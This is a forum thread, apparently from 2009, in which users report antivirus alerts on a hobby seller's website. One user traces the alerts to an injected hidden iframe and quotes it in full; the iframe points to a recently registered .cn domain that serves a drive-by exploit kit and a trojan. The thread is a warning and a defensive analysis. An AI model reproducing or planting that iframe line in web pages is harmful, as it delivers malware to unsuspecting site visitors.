O-Like Virus?

[BrewCityMusic]

Hmmm....Anyone else getting virus alerts on the O-Like site this morning? I want to order a few Dildas, but my AV program keeps panicking and not letting me access the site.

Doesn't happen with the laptop, though... Weird. Anyone else having the trouble?

 

[Th0ughts]

What antivirus, bro?

 

[FrancoRob]

I just got the same indication after trying to visit Standstone11 site: (http://www.o-like.com/ )
My antivirus is the Avira Premium Security Suite 2009.

 

[charliebruce]

<iframe src=http://www.2009tttt.cn/jzll/2.htm width=50 height=0 border=0></iframe>

I don't know what thiis bit is about, a domain lookup reports:


Whois Record

Domain Name: 2009tttt.cn
ROID: 20090202s10001s11551185-cn
Domain Status: ok
Registrant Organization: [ch29579][ch26195][ch23792]
Registrant Name: [ch29579][ch26195][ch23792]
Administrative Email:
Sponsoring Registrar: [ch21271][ch20140][ch19975][ch32593][ch24535][ch25104][ch31185][ch25216][ch26377][ch38480][ch20844][ch21496]
Name Server:ns.cdnhost.cn
Name Server:ns.dnsfamily.com
Registration Date: 2009-02-02 21:42
Expiration Date: 2010-02-02 21:42

It's only registered 2 days ago?

That page contains ANOTHER iframe to some code I can't post, and a javascript page (page not found, on a Yahoo host), but looks VERY MUCH LIKE A VIRUS! BE CAREFUL! This has happened before where a page is hjacked on a vulnerable server to spread their virus and blame a reputable seller. I'm going to PM the owner - it's someone with a name like standstone11?

 

[charliebruce]

I've now posted a PM to Standstone11 but if she doesn't respond I'll email the address on their homepage. Any more experienced people want to check this out? I'll do some googling and post back here.

(PS: If you're reading this, Standstone11, I've had my eye on some of your green modules, and I may well have saved you some customers )

 

[ndrew2505]

their site probably got hacked. the same thing happened to me on snoctony's site a while back..

 

[charliebruce]

Another edit: It's definitely a virus, actually a conglomeration of several chiinese-written viruses targeting people with browser language en-us. I remembver reading about this - does anyone know the best place to report this? My analysis shows this is a pretty major attack, targeting a collection of old bugs in Windows, IE, Flash player, NS5 and some badly-written ActiveX objects, amongst other pieces of software. This is an organised and malicious attack - my advce is to avoid the site for the time being - this poses a real risk - in IE6 or if you're runninig compromised software it could run a malicious program, log keys or other major problems without your knowledge or consent. To anyone who has visited, I'd recommend a scan but it's probably too recent to be detected. If anyone wants more info PM me, I have got the entire network (or most of it anyway) downloaded safely.

 

[ndrew2505]

tell susie that if they value their business to remove it...

 

[laserwanabe]

I forgot what the hack is but I do know that they get into all the files on the page and can change anything basically.

It very dependent on the servers firewall that the site it hosted on

 

[Danjoo]

Another edit: It's definitely a virus, actually a conglomeration of several chiinese-written viruses targeting people with browser language en-us.

on this case it include german browser tags. :-?

daniel

 

[frogger]

I just checked the source and couldn't find any mention of 2009tttt or whatever, nor any iframes for that matter.
I didn't recieve any alerts, in opera or IE.

I think its safe, but i would wait for susie to confirm, as it is her website.

 

[Standstone11]

I just checked the source and couldn't find any mention of 2009tttt or whatever, nor any iframes for that matter.
I didn't recieve any alerts, in opera or IE.

I think its safe, but i would wait for susie to confirm, as it is her website.

Dear all ,

There is no any problem on my website .,you an open it again and again .no warning sent .today we receive orders as normal . no abnormal happend.

Susie

 

[FrancoRob]

Hi Susie, after your message I have visited your website without any problem, so everything is ok now.

 

[charliebruce]

Yep, it has been fixed last night - if you want to see what was on there (for people interested in that kind of stuff) have a look at the page the iFrame linked to, but be careful - it targets old versions of flash player, IE users, ActiveX controls with vulnerabilities recently published, Netscape 5 browsers, and chooses to target people with browser language EN-US and NOT zh-cn. (That could be a good safety-catch so the writer doesn't get bitten by his own bug, nor his friends) It also tries to download a trojan, and has a VBS virus in there too. I had a security expert (well, really a network admin, but same difference) look at it, I can find out in more detail from him tomorrow. Anyone running these compromised systems who visited o-like in the last few days should do a full virus scan, I know for a fact Kaspersky's online scanner will be able to see at least one of these viruses, and so warn you. It doesn't see the VBS part of the virus though, so a clean Kaspersky scan doesn't necessarily indicate you're clean...

 

[WackBag]

Her website is fine now...good job for fixing it